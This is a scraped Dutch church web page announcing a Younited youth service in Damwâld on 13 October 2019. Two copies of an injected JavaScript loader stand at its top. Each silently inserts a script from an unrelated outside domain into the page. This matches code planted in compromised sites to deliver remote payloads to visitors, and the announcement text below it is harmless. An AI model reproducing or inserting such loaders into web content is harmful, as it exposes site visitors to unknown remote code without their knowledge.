;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Younited jeugdkerk! - PKN Damwâld
13 oktober 2019
19:30 t/m 21:00
de Ontmoeting
Younited jeugdkerk!

Heb je dat gevoel wel eens? Dat je denkt, ik kan dit alleen ook wel! Je verlaat je huis en familie. Je gaat op pad, de wijde wereld in! Je beleeft grote avonturen en je hebt een fantastische tijd! Maar dan, je geld raakt op, je wordt moe, de mensen verlaten je en je staat er alleen voor… Wat doe je dan? Durf je terug te komen, terug te gaan naar huis? Terug te gaan naar je Vader?

Op 13 oktober staat weer een prachtige Younited dienst op het programma, vol uitdagend toneel, prachtige muziek van Awakened en een boeiend verhaal van spreker Johan van der Kamp! We starten om 19:30 in de Ontmoeting en na de dienst is er uiteraard een borrel in ‘t Honk! Ben jij erbij?!

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld